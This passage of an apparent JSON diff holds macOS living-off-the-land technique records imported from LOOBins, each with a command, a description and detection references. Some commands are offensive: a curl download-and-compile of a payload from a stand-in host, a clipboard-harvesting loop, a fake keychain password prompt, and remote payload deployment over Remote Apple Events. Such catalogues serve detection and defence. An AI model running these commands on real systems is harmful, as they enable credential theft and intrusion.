"https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nvram.yml", + "https://ss64.com/osx/nvram.html" + ] + }, + { + "id": "loobins:odutil:1a80777abd38d15d", + "toolId": "loobins:odutil", + "toolName": "odutil", + "name": "Listing the available node names", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "odutil show nodenames", + "description": "List all available node names", + "mitre": [], + "fullPath": [ + "/usr/bin/odutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml", + "https://macosbin.com/bin/odutil", + "https://www.unix.com/man-page/osx/1/odutil/" + ] + }, + { + "id": "loobins:odutil:c97f832e924791c8", + "toolId": "loobins:odutil", + "toolName": "odutil", + "name": "Retrieves active session", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "odutil show sessions", + "description": "Retrieves all active sessions", + "mitre": [], + "fullPath": [ + "/usr/bin/odutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml", + "https://macosbin.com/bin/odutil", + "https://www.unix.com/man-page/osx/1/odutil/" + ] + }, + { + "id": "loobins:odutil:27e596cc427f4d65", + "toolId": "loobins:odutil", + "toolName": "odutil", + "name": "Retrieves \"Default search policy\"", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "odutil show configuration /Search", + "description": "Retrieves the configuration of \"Default search policy\"", + "mitre": [], + "fullPath": [ + "/usr/bin/odutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml", + "https://macosbin.com/bin/odutil", + "https://www.unix.com/man-page/osx/1/odutil/" + ] + }, + { + "id": "loobins:odutil:076a878e325ba974", + "toolId": "loobins:odutil", + "toolName": "odutil", + "name": "Retrieves \"Contact search policy\"", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery" + ], + "nativeCategory": [ + "Discovery" + ], + "command": "odutil show configuration /Contacts", + "description": "Retrieves the configuration of \"Contact search policy\"", + "mitre": [], + "fullPath": [ + "/usr/bin/odutil" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml", + "https://macosbin.com/bin/odutil", + "https://www.unix.com/man-page/osx/1/odutil/" + ] + }, + { + "id": "loobins:open:9d6e5bf92253e8b1", + "toolId": "loobins:open", + "toolName": "open", + "name": "Open a malicious file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "open Malicious.app", + "description": "The open command can be used to open a malicious macOS app from the terminal.", + "mitre": [], + "fullPath": [ + "/usr/bin/open" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/open.yml", + "https://scriptingosx.com/2017/02/the-macos-open-command/" + ] + }, + { + "id": "loobins:open:baa2cd4b26d3da10", + "toolId": "loobins:open", + "toolName": "open", + "name": "Download a malicious file", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "open -g https://mypayload.io/payload.zip; sleep 3; killall Safari", + "description": "The following command downloads the payload.zip file in the default browser (Safari) and then kills it.", + "mitre": [], + "fullPath": [ + "/usr/bin/open" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "No detections at time of publishing", + "value": "No detections at time of publishing" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/open.yml", + "https://scriptingosx.com/2017/02/the-macos-open-command/" + ] + }, + { + "id": "loobins:osacompile:62c7b7fda3724111", + "toolId": "loobins:osacompile", + "toolName": "osacompile", + "name": "Download and compile a payload", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [], + "nativeCategory": [ + "Command and Control", + "Resource Development" + ], + "command": "curl https://getpayload.com/payload_code.apple_script && osacompile -x -e payload_code.apple_script -o payload.app", + "description": "The following command downloads an applescript payload from getpayload.com and compiles it into an app.", + "mitre": [], + "fullPath": [ + "/usr/bin/osacompile" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Sigma: In-Memory Download And Compile Of Payloads (experimental/pending)", + "value": "https://github.com/SigmaHQ/sigma/pull/4127/commits/f4b0264a83e5f47473029e26dc0879fb196a7d07" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osacompile.yml", + "https://redcanary.com/blog/mac-application-bundles/" + ] + }, + { + "id": "loobins:osascript:eb192e839a2c73e1", + "toolId": "loobins:osascript", + "toolName": "osascript", + "name": "Use the osascript binary to gather sensitive clipboard data", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection", + "Credential Access" + ], + "nativeCategory": [ + "Collection", + "Credential Access" + ], + "command": "while true; do echo $(osascript -e 'return (the clipboard)') >> clipdata.txt; sleep 10; done", + "description": "A bash loop can gather clipboard contents over a defined time period. The following command calls /usr/bin/osascript -e 'return (the clipboard)' indefinitely every 10 seconds and writes clipboard content to a text file.", + "mitre": [], + "fullPath": [ + "/usr/bin/osascript" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", + "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" + }, + { + "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", + "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" + }, + { + "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", + "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", + "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:osascript:e7145a781a0f1138", + "toolId": "loobins:osascript", + "toolName": "osascript", + "name": "Use the osascript binary to gather system information", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Collection", + "Discovery" + ], + "nativeCategory": [ + "Collection", + "Discovery" + ], + "command": "osascript -e 'return (system info)'", + "description": "osascript can be used to gather the operating system version, current username, user ID, computer name, IP address, and other information.", + "mitre": [], + "fullPath": [ + "/usr/bin/osascript" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", + "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" + }, + { + "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", + "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" + }, + { + "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", + "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", + "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:osascript:d587958586ecaf12", + "toolId": "loobins:osascript", + "toolName": "osascript", + "name": "Use the osascript binary to prompt the user for credentials", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Credential Access" + ], + "nativeCategory": [ + "Credential Access" + ], + "command": "osascript -e 'set popup to display dialog \"Keychain Access wants to use the login keychain\" & return & return & \"Please enter the keychain password\" & return default answer \"\" with icon file \"System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:FileVaultIcon.icns\" with title \"Authentication Needed\" with hidden answer'", + "description": "osascript can be used to generate a dialogue box and request the user to enter the keychain password.", + "mitre": [], + "fullPath": [ + "/usr/bin/osascript" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", + "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" + }, + { + "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", + "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" + }, + { + "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", + "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", + "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:osascript:eee928fec29a8165", + "toolId": "loobins:osascript", + "toolName": "osascript", + "name": "Use the osascript binary to execute a JXA (JavaScript for Automation) file.", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution" + ], + "nativeCategory": [ + "Execution" + ], + "command": "echo \"ObjC.import('Cocoa');\\nObjC.import('stdlib');\\nvar currentApp = Application.currentApplication();\\ncurrentApp.includeStandardAdditions = true;\\ncurrentApp.doShellScript('open -a Calculator.app');\" > calc.js && osascript -l JavaScript calc.js", + "description": "JXA is often used by red teams (and potentially attackers) as a macOS payload, as JXA is native to macOS and can access various internal macOS APIs (such as Cocoa, Foundation, OSAKit, etc.). The osascript binary can be used to execute JXA payloads by simply running \"osascript [file.js]\" but some malware or offensive tools may also use \"osascript -l JavaScript [file.js]\".", + "mitre": [], + "fullPath": [ + "/usr/bin/osascript" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", + "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" + }, + { + "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", + "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" + }, + { + "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", + "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", + "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:osascript:f761e47f7cf28e2e", + "toolId": "loobins:osascript", + "toolName": "osascript", + "name": "Execute shell commands via osascript do shell script", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Defense Evasion", + "Privilege Escalation" + ], + "nativeCategory": [ + "Execution", + "Defense Evasion", + "Privilege Escalation" + ], + "command": "osascript -e 'do shell script \"id\"'", + "description": "osascript's 'do shell script' handler executes arbitrary shell commands through the AppleScript runtime. Commands spawned this way are children of osascript rather than the calling shell, which can bypass detection logic tied to specific parent-child process relationships. The 'with administrator privileges' flag triggers a native macOS authentication prompt and runs the command as root if the user authenticates, without requiring sudo.", + "mitre": [], + "fullPath": [ + "/usr/bin/osascript" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", + "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" + }, + { + "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", + "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" + }, + { + "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", + "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", + "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:osascript:a48177c8d82f5af7", + "toolId": "loobins:osascript", + "toolName": "osascript", + "name": "Remote command execution over SSH using osascript do shell script", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Lateral Movement", + "Execution" + ], + "nativeCategory": [ + "Lateral Movement", + "Execution" + ], + "command": "ssh -i key.pem user@<TARGET_IP> 'bash -s' <<'EOF'\nosascript -e 'do shell script \"id\"'\nEOF", + "description": "osascript's 'do shell script' handler can be invoked over an SSH session to execute arbitrary shell commands on a remote macOS host. This technique requires only SSH access to the target. Unlike when using Remote Apple Events (eppc://) with osascript, it does not require port 3031 to be accessible, Remote Apple Events to be enabled, or the target application to be running. This makes it viable against hosts where eppc:// is blocked by the firewall or disabled in System Settings, and against headless or server Macs that have no active GUI session.", + "mitre": [], + "fullPath": [ + "/usr/bin/osascript" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", + "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" + }, + { + "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", + "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" + }, + { + "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", + "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", + "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:osascript:1b57fc0621ffd467", + "toolId": "loobins:osascript", + "toolName": "osascript", + "name": "Mount SMB volume without GUI using osascript mount volume", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Lateral Movement" + ], + "nativeCategory": [ + "Lateral Movement" + ], + "command": "osascript -e 'mount volume \"smb://user:<PASSWORD>@<TARGET_IP>/share\"'", + "description": "osascript can mount an SMB share on the local machine using the 'mount volume' command. This approach bypasses the macOS GUI requirement for enabling Windows File Sharing password storage on the target, which is required when using the mount command directly. The share is mounted to /Volumes/<sharename> and its contents are immediately accessible as local files.", + "mitre": [], + "fullPath": [ + "/usr/bin/osascript" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", + "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" + }, + { + "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", + "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" + }, + { + "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", + "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", + "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:osascript:a3236c80ab72db2e", + "toolId": "loobins:osascript", + "toolName": "osascript", + "name": "Remote payload deployment via Terminal.app as a Remote Apple Events proxy", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Execution", + "Lateral Movement" + ], + "nativeCategory": [ + "Execution", + "Lateral Movement" + ], + "command": "osascript <<EOF\ntell application \"Terminal\" of machine \"eppc://${VICTIM_USER}:${VICTIM_PASS}@${VICTIM_IP}\"\n do script \"echo \\\"${PAYLOAD_B64}\\\" | base64 --decode > ${REMOTE_SCRIPT_PATH} && chmod +x ${REMOTE_SCRIPT_PATH}\" in window 1\nend tell\nEOF\n\nosascript <<EOF\ntell application \"Terminal\" of machine \"eppc://${VICTIM_USER}:${VICTIM_PASS}@${VICTIM_IP}\"\n do script \"bash ${REMOTE_SCRIPT_PATH}\" in window 1\nend tell\nEOF", + "description": "The System Events application blocks remote do shell script execution via Remote Apple Events (RAE), returning a -10016 Handler Error. Terminal.app does not have this restriction and accepts remote do script commands over the eppc:// protocol. This makes Terminal.app an effective execution proxy. Payloads are Base64-encoded before transmission to avoid AppleScript parsing errors (-2741) caused by multi-line scripts. The deployment is a two-stage process - the first RAE command decodes the payload to a temporary path and sets execute permissions, and the second invokes it via bash. This technique can also be classified as a Software Deployment Tool (T1072) - it operates via Apple Events IPC rather than standard shell processes, creating a telemetry gap in security tooling focused on process execution trees.", + "mitre": [], + "fullPath": [ + "/usr/bin/osascript" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", + "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" + }, + { + "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", + "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" + }, + { + "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", + "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", + "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:osascript:c01ea000e14e56db", + "toolId": "loobins:osascript", + "toolName": "osascript", + "name": "Remote volume enumeration via Finder over Remote Apple Events", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Discovery", + "Lateral Movement" + ], + "nativeCategory": [ + "Discovery", + "Lateral Movement" + ], + "command": "osascript -e 'tell application \"Finder\" of machine \"eppc://user:password@<TARGET_IP>\" to get name of every disk'", + "description": "The Finder application is scriptable over Remote Apple Events (RAE) via the eppc:// URI scheme. osascript can address a remote Finder instance to query mounted volumes on the target machine, providing an adversary with immediate insight into available network shares and external storage. These actions are performed via Apple Events IPC rather than shell commands, bypassing security telemetry focused on process execution.", + "mitre": [], + "fullPath": [ + "/usr/bin/osascript" + ], + "environment": [ + "Local host" + ], + "availability": "Built in", + "verification": "Upstream reference", + "compatibility": "Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.", + "detection": [ + { + "type": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)", + "value": "Command Line Argument Detection (args contain osascript AND -e AND clipboard)" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript gathering clipboard content", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_system_information.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to osascript pulling system information", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_gather_clipboard.yaml" + }, + { + "type": "Jamf Protect: Detect activity that is related to generating dialogs using osascript and asking for specific user input", + "value": "https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/applescript_dialog_activity.yaml" + }, + { + "type": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)", + "value": "Process Lineage Detection: Monitor for suspicious process trees indicative of RAS-based execution (launchd -> AppleEventsD -> Terminal -> sh/bash)" + }, + { + "type": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications", + "value": "Command Line Argument Detection: osascript executions containing eppc:// arguments or base64 --decode commands originating from GUI applications" + } + ], + "references": [ + "https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml", + "https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121", + "https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/" + ] + }, + { + "id": "loobins:pbpaste:652de80e6c1533ef", + "toolId": "loobins:pbpaste", + "toolName": "pbpaste", + "name": "Use pbpaste to collect sensitive clipboard data", + "source": "LOOBins", + "platform": [ + "macOS" + ], + "capability": [ + "Credential Access", + "Collection" + ], + "nativeCategory": [ + "Credential Access", + "Collection" + ], + "command": "while true; do echo $(pbpaste) 